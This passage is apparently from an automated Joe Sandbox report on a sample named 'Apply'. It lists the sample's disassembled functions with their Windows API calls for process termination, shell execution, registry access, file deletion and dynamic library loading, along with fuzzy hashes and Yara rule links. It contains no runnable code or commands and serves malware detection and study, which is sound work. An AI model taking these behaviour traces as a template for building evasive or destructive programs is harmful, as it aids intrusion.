OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008BF1A5
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008BF1AF
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008BF1B6

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: ef774847959467db9e0fce2ef0228133dc3ca64872e0f5b0b198633dce62f0e1
Instruction ID: 7a117afa9aae4b8ee616960f0b07ac5ce173e5ec3241f544b6dd33b27889fe63
Opcode Fuzzy Hash: ef774847959467db9e0fce2ef0228133dc3ca64872e0f5b0b198633dce62f0e1
Instruction Fuzzy Hash: 3CF03032241298BFE72157529C4EEEF7B7CFFC6B11F000059F611D9191D7A06A05C6B5

Function 008BCBB5 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00853914: _wcslen.LIBCMT ref: 00853919

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008BCCD3
_wcslen.LIBCMT ref: 008BCD1A
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008BCD81
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 008BCDAF

Strings

0, xrefs: 008BCC94

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: a42c2d09e69302367701bbe6db99d4a667abb46a3c43c71e607a5a501896520c
Instruction ID: fd3ccd899309556874614a9afec8a1edc8b8e2defbbd3e7e6369e02f25b5ed38
Opcode Fuzzy Hash: a42c2d09e69302367701bbe6db99d4a667abb46a3c43c71e607a5a501896520c
Instruction Fuzzy Hash: 6251DF756043019BD7259F28C885BABBFE8FB95354F080A3DF995D72A0DB70D904CB52

Function 008DB4EB Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 008DB62A

Part of subcall function 00853914: _wcslen.LIBCMT ref: 00853919

GetProcessId.KERNEL32(00000000), ref: 008DB6BF
CloseHandle.KERNEL32(00000000), ref: 008DB6EE

Strings

<, xrefs: 008DB5F2
@, xrefs: 008DB5F9

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: 6422343fc520dfc9e4c2737db63a5dc29b007c5a6c46ba16247deacb7ca3a0ee
Instruction ID: f347878f8a5602801aae006d0d6e7e393ce43d02737c887d2733208e5b88dd6b
Opcode Fuzzy Hash: 6422343fc520dfc9e4c2737db63a5dc29b007c5a6c46ba16247deacb7ca3a0ee
Instruction Fuzzy Hash: F8714271A00219DFCB14EF58D485A9EBBF1FF08314F05859AE856AB3A2CB70ED45CB91

Function 008B7897 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 008B78FF
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 008B7935
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 008B7946
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 008B79C8

Strings

DllGetClassObject, xrefs: 008B793B

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 529cbeb1e0029bef46bc5a83073c75cd9614eebf3c5da2f786a511677646d37f
Instruction ID: f032190e8d7b358ac0e426957b928028534ebc25ebf08de887fb776ba033911a
Opcode Fuzzy Hash: 529cbeb1e0029bef46bc5a83073c75cd9614eebf3c5da2f786a511677646d37f
Instruction Fuzzy Hash: F6412971604319AFDF15CF64C884A9ABBB9FF84314F1480AAA905DF346D7B5DA44CBA0

Function 008E453A Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008E45F3
IsMenu.USER32(?), ref: 008E4608
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 008E4650
DrawMenuBar.USER32 ref: 008E4663

Strings

0, xrefs: 008E4547

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: b2ac31ce41286ebf513f05db7affc92ff2d8818896a192c8b347a1a64db7bec2
Instruction ID: 3f943a424d966249613dd23ce5bdbe7d118c67b9e8ea7e6685ee253ce88eb0fe
Opcode Fuzzy Hash: b2ac31ce41286ebf513f05db7affc92ff2d8818896a192c8b347a1a64db7bec2
Instruction Fuzzy Hash: 1D415B74A01289EFEB20CF55D884EAABBB8FF56318F045169E929DB261C730ED44CF50

Function 008B24C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0085A1D4: _wcslen.LIBCMT ref: 0085A1DE

Part of subcall function 008B4392: GetClassNameW.USER32(?,?,000000FF), ref: 008B43B5

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 008B2548
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 008B255B
SendMessageW.USER32(?,00000189,?,00000000), ref: 008B258B

Part of subcall function 00857467: _wcslen.LIBCMT ref: 0085747A

Strings

ComboBox, xrefs: 008B24D2
ListBox, xrefs: 008B2507

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: 7aa391f9c7b2f2b2f1d4db592c15aa994873bfe70e3a357a42eb3fbffa93c962
Instruction ID: 3827a890c22b83c122855e365cf87e98343db0ee86f3d278bd17cb3a79ec6bad
Opcode Fuzzy Hash: 7aa391f9c7b2f2b2f1d4db592c15aa994873bfe70e3a357a42eb3fbffa93c962
Instruction Fuzzy Hash: C2210771940108BEDB15ABA4CC9ACFFBBB8FF45354F504519F822DB3D1CB38494A9621

Function 008E36D5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 008E374B
LoadLibraryW.KERNEL32(?), ref: 008E3752
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 008E3767
DestroyWindow.USER32(?), ref: 008E376F

Strings

SysAnimate32, xrefs: 008E3726

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 947d7cf780539d2954d837030a349b15e91a13b4275399c10b4ae93016206a4a
Instruction ID: 1d76a778bb33af5237b2bd7eddfaed75f7b540a51861c5c4f6ddc3f3b6cd0a94
Opcode Fuzzy Hash: 947d7cf780539d2954d837030a349b15e91a13b4275399c10b4ae93016206a4a
Instruction Fuzzy Hash: C1216DB1210289BBEB104FB6DC88EAB37A9FB56369F104628F910D71A0D771DD51A760

Function 008750BD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0087506E,?,?,0087500E,?,009198A8,0000000C,00875165,?,00000002), ref: 008750DD
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 008750F0
FreeLibrary.KERNEL32(00000000,?,?,?,0087506E,?,?,0087500E,?,009198A8,0000000C,00875165,?,00000002,00000000), ref: 00875113

Strings

mscoree.dll, xrefs: 008750D6
CorExitProcess, xrefs: 008750E8

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 87157476b8592f0af77177cc7c08f2dbaefefa2b451a7455b1d3ba37cdc3daea
Instruction ID: 666716bc0ac90101f7c0bf79d36064a03e3b67d2e404298a3fc5be5843deb329
Opcode Fuzzy Hash: 87157476b8592f0af77177cc7c08f2dbaefefa2b451a7455b1d3ba37cdc3daea
Instruction Fuzzy Hash: 2EF0AF30A0030CBBDB109BA4DC89BADBFB4FF04712F404068F80DE6264DB709944CAA0

Function 008554A3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,008554F0,?,?,00855184,?,00000001,?,?,00000000), ref: 008554AF
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008554C1
FreeLibrary.KERNEL32(00000000,?,?,008554F0,?,?,00855184,?,00000001,?,?,00000000), ref: 008554D3

Strings

kernel32.dll, xrefs: 008554A7
Wow64DisableWow64FsRedirection, xrefs: 008554BB

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 5918150eded463d220edcf9300d018952c6853a678799a4a9cdfb29d256802ad
Instruction ID: 869ec9db9937bbd7e08bf3cbe7fa8c7ed9b752eefbe197ca0f58028578ec81fe
Opcode Fuzzy Hash: 5918150eded463d220edcf9300d018952c6853a678799a4a9cdfb29d256802ad
Instruction Fuzzy Hash: 7BE0C276B02B621B92221715AC18B6EB629FFC2F337054055FE06EA204DB64CC4980E4

Function 0085546C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,0089466F,?,?,00855184,?,00000001,?,?,00000000), ref: 00855475
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00855487
FreeLibrary.KERNEL32(00000000,?,?,0089466F,?,?,00855184,?,00000001,?,?,00000000), ref: 0085549A

Strings

Wow64RevertWow64FsRedirection, xrefs: 00855481
kernel32.dll, xrefs: 0085546E

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 925efb8314ed4e100780712831bb20936cc0fb4af8b4533dc6e021cd9eeda6eb
Instruction ID: bf774a84bf8255c7813c718b82a8d519f2738f5cee1f28096768057378d805d9
Opcode Fuzzy Hash: 925efb8314ed4e100780712831bb20936cc0fb4af8b4533dc6e021cd9eeda6eb
Instruction Fuzzy Hash: E2D01275602BA16B46321725EC18ADABB26FE85B273454025BC04EA114DF25DD89859C

Function 008C3030 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008C32EE
DeleteFileW.KERNEL32(?), ref: 008C3370
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 008C3386
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008C3397
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008C33A9

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 603d2f4d0fdacf095a47fac7962a98334ac7fd3fcf11e99450d0eb8e35cf44b2
Instruction ID: e46d6a852eb737bc0fbad0bd824a948596eca244b2aa04270b52acb3038b04c2
Opcode Fuzzy Hash: 603d2f4d0fdacf095a47fac7962a98334ac7fd3fcf11e99450d0eb8e35cf44b2
Instruction Fuzzy Hash: F3B11D72900219ABDF11DBA8CC85EDEBBBDFF49315F1080AAF509E6145EA30DB458F61

Function 008DAB0E Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 008DABAE
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 008DABBC
GetProcessIoCounters.KERNEL32(00000000,?), ref: 008DABEF
CloseHandle.KERNEL32(?), ref: 008DADC4

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 998c2bff352128d18817f63e18de37b2983efbfe621936bfb57e134469c29d1a
Instruction ID: 04687b1900259742faf0da78028c8276a7e5e1785e643129063ee7c231f81fe2
Opcode Fuzzy Hash: 998c2bff352128d18817f63e18de37b2983efbfe621936bfb57e134469c29d1a
Instruction Fuzzy Hash: 2CA19C71604300AFD724EF28C882B2AB7E5FB44725F14895DF999DB392D770ED458B82

Function 008DC150 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0085A1D4: _wcslen.LIBCMT ref: 0085A1DE

Part of subcall function 008DD11F: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008DBE35,?,?), ref: 008DD13C
Part of subcall function 008DD11F: _wcslen.LIBCMT ref: 008DD178
Part of subcall function 008DD11F: _wcslen.LIBCMT ref: 008DD1E6
Part of subcall function 008DD11F: _wcslen.LIBCMT ref: 008DD21C

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008DC22C
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008DC287
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 008DC2EA
RegCloseKey.ADVAPI32(?,?), ref: 008DC32D
RegCloseKey.ADVAPI32(00000000), ref: 008DC33A

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 5d7b26341f9fdba3183f3e2ac92ed41a7cb2142848af0e1be892ee0d03c0d3f5
Instruction ID: e13a4b6b368b2967fc4367459090e874c4afe79b4dcd2d1dc569939002760a04
Opcode Fuzzy Hash: 5d7b26341f9fdba3183f3e2ac92ed41a7cb2142848af0e1be892ee0d03c0d3f5
Instruction Fuzzy Hash: 17614C31208242AFD714DF54C495E2ABBE5FF84308F54869DF4998B392DB31ED4ACB92

Function 008BEA3C Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 008BE421: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008BD507,?), ref: 008BE43E

Part of subcall function 008BE421: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008BD507,?), ref: 008BE457

Part of subcall function 008BE7DA: GetFileAttributesW.KERNEL32(?,008BD57A), ref: 008BE7DB

lstrcmpiW.KERNEL32(?,?), ref: 008BEAB4
MoveFileW.KERNEL32(?,?), ref: 008BEAED
_wcslen.LIBCMT ref: 008BEC2C
_wcslen.LIBCMT ref: 008BEC44
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 008BEC91

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: 916c3f73eb5b61895118a8b41a6e26c0b4dcd67aade5d2f06b64d12b71c2a316
Instruction ID: 91b7b26f1baf9e7bfd0b26c9efde531e9f79ba7b3d36e409e9e55b81848996a3
Opcode Fuzzy Hash: 916c3f73eb5b61895118a8b41a6e26c0b4dcd67aade5d2f06b64d12b71c2a316
Instruction Fuzzy Hash: ED5130B24083959FC724EB94C8819DBB7ECFF94311F40492EF689D3291EE70A6898757

Function 008B92A9 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 008B92C6
VariantClear.OLEAUT32 ref: 008B9337
VariantClear.OLEAUT32 ref: 008B9396
VariantClear.OLEAUT32(?), ref: 008B9409
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 008B9434

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 4df10d05ec899ccf79de1ccaa99687c2f9adb535d34d09db94e8bff11ea43fe7
Instruction ID: ce01bc4d6a1a114a5c51f53a8f23f3a76b65c13b03f413d9f40a20ad9481b34a
Opcode Fuzzy Hash: 4df10d05ec899ccf79de1ccaa99687c2f9adb535d34d09db94e8bff11ea43fe7
Instruction Fuzzy Hash: FB515AB5A00619EFCB14CF68C884AAAB7F9FF8D314B158159E949DB350E730E912CB94

Function 008C926A Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 008C931D
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 008C9349
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 008C93A1
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 008C93C6
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 008C93CE

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 34cd5ae8ea85beda34e08aca6a651c04482a7c76b7fcf40d9859fc90f83ffb7c
Instruction ID: c59c46964866ca6c6e669c73a33422dd6f3e2def9b82c146d27cc244f0208dbf
Opcode Fuzzy Hash: 34cd5ae8ea85beda34e08aca6a651c04482a7c76b7fcf40d9859fc90f83ffb7c
Instruction Fuzzy Hash: 48511A35A002559FCB05DF69C885E69BBF5FF48314F048098E949AB3A2CB35ED45CB91

Function 008D966B Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 008D96C7
GetProcAddress.KERNEL32(00000000,?), ref: 008D9757
GetProcAddress.KERNEL32(00000000,00000000), ref: 008D9773
GetProcAddress.KERNEL32(00000000,?), ref: 008D97B9
FreeLibrary.KERNEL32(00000000), ref: 008D97D9

